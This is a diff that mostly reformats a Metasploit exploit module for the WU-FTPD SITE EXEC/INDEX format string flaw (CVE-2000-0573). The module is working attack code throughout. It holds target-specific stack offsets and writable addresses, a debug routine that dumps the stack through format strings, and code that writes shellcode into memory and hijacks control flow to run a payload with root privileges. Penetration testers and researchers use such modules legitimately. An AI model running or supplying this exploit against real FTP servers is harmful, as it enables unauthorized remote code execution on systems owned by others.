@@ -1,4 +1,5 @@
 # encoding: binary
+
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -11,100 +12,108 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FormatString
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'WU-FTPD SITE EXEC/INDEX Format String Vulnerability',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'WU-FTPD SITE EXEC/INDEX Format String Vulnerability',
+        'Description' => %q{
           This module exploits a format string vulnerability in versions of the
-        Washington University FTP server older than 2.6.1. By executing
-        specially crafted SITE EXEC or SITE INDEX commands containing format
-        specifiers, an attacker can corrupt memory and execute arbitrary code.
-      },
-      'Author'         => [ 'jduck' ],
-      'References'     =>
-        [
+          Washington University FTP server older than 2.6.1. By executing
+          specially crafted SITE EXEC or SITE INDEX commands containing format
+          specifiers, an attacker can corrupt memory and execute arbitrary code.
+        },
+        'Author' => [ 'jduck' ],
+        'References' => [
           ['CVE', '2000-0573'],
           ['OSVDB', '11805'],
           ['BID', '1387']
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'process',
           'PrependChrootBreak' => true
         },
-      'Privileged'     => true,
-      'Payload'        =>
-        {
+        'Privileged' => true,
+        'Payload' => {
           # format string max length
-          'Space'    => 256,
+          'Space' => 256,
           # NOTE: \xff's need to be doubled (per ftp/telnet stuff)
           'BadChars' => "\x00\x09\x0a\x0d\x20\x25\x2f",
           'DisableNops'	=> true,
-          'StackAdjustment' 	=> -1500
+          'StackAdjustment' => -1500
         },
-      'Platform'       => [ 'linux' ],
-      'Targets'        =>
-      [
-        #
-        # Automatic targeting via fingerprinting
-        #
-        [ 'Automatic Targeting', { 'auto' => true }  ],
+        'Platform' => [ 'linux' ],
+        'Targets' => [
+          #
+          # Automatic targeting via fingerprinting
+          #
+          [ 'Automatic Targeting', { 'auto' => true } ],
 
-        #
-        # specific targets
-        #
-        [	'Slackware 2.1 (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)',
-          {
-            'UseDPA' 	=> false,
-            'PadBytes'	=> 3,
-            'NumPops' 	=> 8,
-            'AddrPops'  => 100,
-            'Offset'    => -2088, 			# offset to stack return
-            'Writable' 	=> 0xbfffde26, 	# stack, avoid badchars
-            'FlowHook'	=> -1, # auto now... 0xbffff1e4		# stack return addr
-          }
-        ],
-        # these aren't exploitable (using built-in, stripped down vsprintf, no %n)
-        #[	'RedHat 5.2 (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT 1998)',
-        #[	'RedHat 6.0 (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999)',
-        #[	'RedHat 6.1 (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999)',
-        [	'RedHat 6.2 (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000)',
-          {
-            'UseDPA' 	=> true,
-            'PadBytes'	=> 2,
-            'NumPops' 	=> 276,
-            'AddrPops'  => 2,
-            'Offset'    => -17664, 			# offset to stack return
-            'Writable' 	=> 0x806e726,		# bss
-            #'Writable' 	=> 0xbfff0126,		# stack, avoid badchars
-            'FlowHook'	=> -1, # auto now... 0xbfffb028		# stack return addr
-            #'FlowHook'  => 0x806e1e0		# GOT of sprintf
-          }
-        ],
+          #
+          # specific targets
+          #
+          [
+            'Slackware 2.1 (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)',
+            {
+              'UseDPA' => false,
+              'PadBytes'	=> 3,
+              'NumPops' => 8,
+              'AddrPops' => 100,
+              'Offset' => -2088,	# offset to stack return
+              'Writable' => 0xbfffde26,	# stack, avoid badchars
+              'FlowHook'	=> -1, # auto now... 0xbffff1e4		# stack return addr
+            }
+          ],
+          # these aren't exploitable (using built-in, stripped down vsprintf, no %n)
+          # [	'RedHat 5.2 (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT 1998)',
+          # [	'RedHat 6.0 (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999)',
+          # [	'RedHat 6.1 (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999)',
+          [
+            'RedHat 6.2 (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000)',
+            {
+              'UseDPA' => true,
+              'PadBytes'	=> 2,
+              'NumPops' => 276,
+              'AddrPops' => 2,
+              'Offset' => -17664,	# offset to stack return
+              'Writable' => 0x806e726,	# bss
+              # 'Writable' 	=> 0xbfff0126,		# stack, avoid badchars
+              'FlowHook'	=> -1, # auto now... 0xbfffb028		# stack return addr
+              # 'FlowHook'  => 0x806e1e0		# GOT of sprintf
+            }
+          ],
 
-        #
-        # this one will detect the parameters automagicly
-        #
-        [	'Debug',
-          {
-            'UseDPA' 	=> false,
-            'PadBytes'	=> 0,
-            'NumPops' 	=> 0,
-            'AddrPops'  => -1,
-            'Offset'    => -1,
-            'Writable' 	=> 0x41414242, 	#
-            'FlowHook'	=> 0x43434545		#
-          }
+          #
+          # this one will detect the parameters automagicly
+          #
+          [
+            'Debug',
+            {
+              'UseDPA' => false,
+              'PadBytes'	=> 0,
+              'NumPops' => 0,
+              'AddrPops' => -1,
+              'Offset' => -1,
+              'Writable' => 0x41414242,
+              'FlowHook'	=> 0x43434545
+            }
+          ],
         ],
-      ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => 'Jun 22 2000'))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Jun 22 2000',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
     register_options(
       [
         Opt::RPORT(21),
-      ])
+      ]
+    )
   end
 
-
   def check
     # NOTE: We don't care if the login failed here...
     ret = connect_login
@@ -133,9 +142,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return status
   end
 
-
   def exploit
-
     if (not connect_login)
       fail_with(Failure::Unknown, 'Unable to authenticate')
     end
@@ -178,19 +185,20 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # detect stuff!
     if mytarget.name == "Debug"
-      #fmtstr_set_caps(true, true)
+      # fmtstr_set_caps(true, true)
       # dump the stack, so we can detect stuff magically
       print_status("Dumping the stack...")
       stack = Array.new
       extra = "aaaabbbb"
       1000.times do |x|
-        dw = fmtstr_stack_read(x+1, extra)
+        dw = fmtstr_stack_read(x + 1, extra)
         break if not dw
+
         stack << dw
       end
 
       stack_data = stack.pack('V*')
-      print_status("Obtained #{stack.length*4} bytes of stack data:\n" + Rex::Text.to_hex_dump(stack_data))
+      print_status("Obtained #{stack.length * 4} bytes of stack data:\n" + Rex::Text.to_hex_dump(stack_data))
 
       # detect the number of pad bytes
       idx = stack_data.index("aaaabbbb")
@@ -217,8 +225,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # debugging -> don't try it!
     return if mytarget.name == "Debug"
 
-    #print_status("ATTACH!")
-    #select(nil,nil,nil,5)
+    # print_status("ATTACH!")
+    # select(nil,nil,nil,5)
 
     fmtstr_detect_caps
 
@@ -234,7 +242,6 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Writing shellcode to: %#x" % sc_loc)
     print_status("Hijacking control via %#x" % ret)
 
-
     # no extra bytes before the padding..
     num_start = 0
 
@@ -251,23 +258,22 @@ class MetasploitModule < Msf::Exploit::Remote
 
       fmtbuf = fmtstr_gen_from_array(num_start, narr, mytarget)
       # a space allows the next part to start with a '/'
-      fmtbuf[num_pad-1,1] = " "
+      fmtbuf[num_pad - 1, 1] = " "
       fmtbuf.gsub!(/\xff/, "\xff\xff")
       if ((res = send_cmd(['SITE', 'EXEC', fmtbuf], true)))
-        if res[0,4] == "500 "
+        if res[0, 4] == "500 "
           fail_with(Failure::Unknown, "Something went wrong when uploading the payload...")
         end
       end
     end
 
-
     # write 'writable' addr to flowhook (execute shellcode)
     # NOTE: the resulting two writes must be done at the same time
     print_status("Attempting to write %#x to %#x.." % [sc_loc, ret])
 
     fmtbuf = generate_fmt_two_shorts(num_start, ret, sc_loc, mytarget)
     # a space allows the next part to start with a '/'
-    fmtbuf[num_pad-1,1] = " "
+    fmtbuf[num_pad - 1, 1] = " "
     fmtbuf.gsub!(/\xff/, "\xff\xff")
     # don't wait for the response here :)
     res = send_cmd(['SITE', 'EXEC', fmtbuf], false)
@@ -276,25 +282,25 @@ class MetasploitModule < Msf::Exploit::Remote
     handler
   end
 
-
   #
   # these two functions are used to read stack memory
   # (used by fmtstr_stack_read()
   #
   def trigger_fmt(fmtstr)
-    return nil if fmtstr.length >= (512 - (4+1 + 4+1 + 2 + 2))
+    return nil if fmtstr.length >= (512 - (4 + 1 + 4 + 1 + 2 + 2))
+
     send_cmd(['SITE', 'EXEC', 'x', fmtstr], true)
   end
 
   def extract_fmt_output(res)
     if (res =~ /^5.. /)
-      #throw "Crap! Something went wrong while dumping the stack..."
+      # throw "Crap! Something went wrong while dumping the stack..."
       return nil
     end
+
     ret = res.strip.split(/\r?\n/)[0]
-    ret = ret[6,ret.length]
+    ret = ret[6, ret.length]
     return ret
   end
 
-
 end
